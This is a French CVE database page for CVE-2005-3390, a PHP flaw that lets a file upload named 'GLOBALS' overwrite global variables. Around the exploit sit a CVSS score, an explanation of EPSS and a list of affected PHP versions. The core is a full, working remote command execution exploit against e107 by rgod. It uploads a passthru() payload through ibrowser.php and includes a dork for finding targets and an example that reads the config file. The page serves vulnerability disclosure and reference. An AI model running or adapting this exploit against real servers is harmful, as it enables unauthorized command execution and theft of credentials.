CVE-2005-3390 : Détail


2005-11-01 01:00 +00:00
2018-10-19 12:57 +00:00

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The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when register_globals is enabled, allows remote attackers to modify the GLOBALS array and bypass security protections of PHP applications via a multipart/form-data POST request with a "GLOBALS" fileupload field.



Metric Score Sévérité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]


EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 26443

Date de publication : 2005-10-30 23:00 +00:00
Auteur : rgod
EDB Vérifié : Yes

source: PHP is prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests. By exploiting this issue, remote attackers may be able to overwrite the GLOBAL variable. This may allow attackers to further exploit latent vulnerabilities in PHP scripts. #!/usr/bin/php -q -d short_open_tag=on <? print_r(' -------------------------------------------------------------------------------- e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands execution exploit by rgod [email protected] site: dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files -------------------------------------------------------------------------------- '); /* works with register_globals=On against PHP < 4.4.1, 5 < PHP < 5.0.6 */ if ($argc<4) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path cmd OPTIONS host: target server (ip/hostname) path: path to e107 cmd: a shell command Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /e107/ ls -la -P1.1.1.1:80 php '.$argv[0].' localhost /e107/ cat ./../../../../e107_config.php -p81 -------------------------------------------------------------------------------- '); die; } /* software site: vulnerable code in class2.php near lines 29-37: ... // Destroy! (if we need to) if($register_globals == true){ while (list($global) = each($GLOBALS)) { if (!preg_match('/^(_POST|_GET|_COOKIE|_SERVER|_FILES|GLOBALS|HTTP.*|_REQUEST|retrieve_prefs|eplug_admin)$/', $global)) { unset($$global); [**] } } unset($global); } ... and in e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php near lines 26-40: ... require_once("../../../../class2.php"); if (!defined('e107_INIT')) { exit; } unset($tinyMCE_imglib_include); //[*] // include image library config settings include 'config.php'; $request_uri = urldecode(empty($HTTP_POST_VARS['request_uri'])?(empty($HTTP_GET_VARS['request_uri'])?'':$HTTP_GET_VARS['request_uri']):$HTTP_POST_VARS['request_uri']); // if set include file specified in $tinyMCE_imglib_include if (!empty($tinyMCE_imglib_include)) { include $tinyMCE_imglib_include; ///[***] } ... you can evade [*] by sending the hash keys of $tinyMCE_imglib_include var and [**] (this *should* unsets the hash keys...) by sending a multipart/form-data request with the "GLOBALS" var here [***] the code will include the temporary file and execute our shellcode see and for details about this php vulnerabilities */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $cmd=""; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="-----------------------------7d529a1d23092a\r\n"; #oh, I want to tell you a story, about a Telecom guy * $data.="Content-Disposition: form-data; name=\"tinyMCE_imglib_include\"; filename=\"suntzu\";\r\n"; #that doesn't know * $data.="Content-Type: image/jpeg;\r\n\r\n"; #the sovereign art of PHP kung-fu, now is desperate and he's seriously * $data.="<?php error_reporting(0);set_time_limit(0);echo 'my_delim';passthru('".$cmd."');echo 'my_delim'; die;?>\r\n";# * $data.="-----------------------------7d529a1d23092a\r\n"; #thinking to kill himself, after he loosed his work * $data.="Content-Disposition: form-data; name=\"-1203709508\"; filename=\"suntzu\";\r\n";//and his honour and self-respect* $data.="Content-Type: image/jpeg;\r\n\r\n"; //because of some brave guys that rooted his boxes.* $data.="1\r\n";# * $data.="-----------------------------7d529a1d23092a\r\n"; #Now, guy, don't cry anymore, but... do something * $data.="Content-Disposition: form-data; name=\"225672436\"; filename=\"suntzu\";\r\n"; #useful, please open the PHP * $data.="Content-Type: image/jpeg;\r\n\r\n"; #manual, like a respectful student. And start to... * $data.="1\r\n";# * $data.="-----------------------------7d529a1d23092a\r\n";# * $data.="Content-Disposition: form-data; name=\"GLOBALS\"; filename=\"suntzu\";\r\n";# * $data.="Content-Type: image/jpeg;\r\n\r\n";# * $data.="1\r\n";# * $data.="-----------------------------7d529a1d23092a--\r\n";# * $packet ="POST ".$p."e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php HTTP/1.0\r\n";# * $packet.="Host: ".$host."\r\n";# * $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";# * $packet.="Content-Length: ".strlen($data)."\r\n";# * $packet.="Accept: text/plain\r\n";# * $packet.="Connection: Close\r\n\r\n";# * $packet.=$data;# * sendpacketii($packet);# * if (strstr($html,"my_delim")){# * echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]); #...pray * } echo "exploit failed... register_globals=off here or wrong PHP version\n"; ?>

Products Mentioned

Configuraton 0

Php>>Php >> Version 3.0

Php>>Php >> Version 3.0.1

Php>>Php >> Version 3.0.2

Php>>Php >> Version 3.0.3

Php>>Php >> Version 3.0.4

Php>>Php >> Version 3.0.5

Php>>Php >> Version 3.0.6

Php>>Php >> Version 3.0.7

Php>>Php >> Version 3.0.8

Php>>Php >> Version 3.0.9

Php>>Php >> Version 3.0.10

Php>>Php >> Version 3.0.11

Php>>Php >> Version 3.0.12

Php>>Php >> Version 3.0.13

Php>>Php >> Version 3.0.14

Php>>Php >> Version 3.0.15

Php>>Php >> Version 3.0.16

Php>>Php >> Version 3.0.17

Php>>Php >> Version 3.0.18

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.5

Php>>Php >> Version 4.0.6

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.0.7

Php>>Php >> Version 4.1.0

Php>>Php >> Version 4.1.1

Php>>Php >> Version 4.1.2

Php>>Php >> Version 4.2

    Php>>Php >> Version 4.2.0

    Php>>Php >> Version 4.2.1

    Php>>Php >> Version 4.2.2

    Php>>Php >> Version 4.2.3

    Php>>Php >> Version 4.3.0

    Php>>Php >> Version 4.3.1

    Php>>Php >> Version 4.3.2

    Php>>Php >> Version 4.3.3

    Php>>Php >> Version 4.3.4

    Php>>Php >> Version 4.3.5

    Php>>Php >> Version 4.3.6

    Php>>Php >> Version 4.3.7

    Php>>Php >> Version 4.3.8

    Php>>Php >> Version 4.3.9

    Php>>Php >> Version 4.3.10

    Php>>Php >> Version 4.3.11

    Php>>Php >> Version 4.4.0

    Php>>Php >> Version 5.0

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0.0

          Php>>Php >> Version 5.0.1

          Php>>Php >> Version 5.0.2

          Php>>Php >> Version 5.0.3

          Php>>Php >> Version 5.0.4

          Php>>Php >> Version 5.0.5


          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vendor-advisory, x_refsource_MANDRIVA

          Tags : vendor-advisory, x_refsource_REDHAT

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : third-party-advisory, x_refsource_SREASON

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vdb-entry, x_refsource_VUPEN

          Tags : mailing-list, x_refsource_BUGTRAQ

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vdb-entry, x_refsource_BID

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vdb-entry, x_refsource_VUPEN

          Tags : vendor-advisory, x_refsource_REDHAT

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : x_refsource_CONFIRM

          Tags : vdb-entry, x_refsource_SECTRACK

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vendor-advisory, x_refsource_OPENPKG

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : third-party-advisory, x_refsource_SECUNIA

          Tags : vendor-advisory, x_refsource_GENTOO

          Tags : vendor-advisory, x_refsource_UBUNTU

          Tags : vendor-advisory, x_refsource_REDHAT
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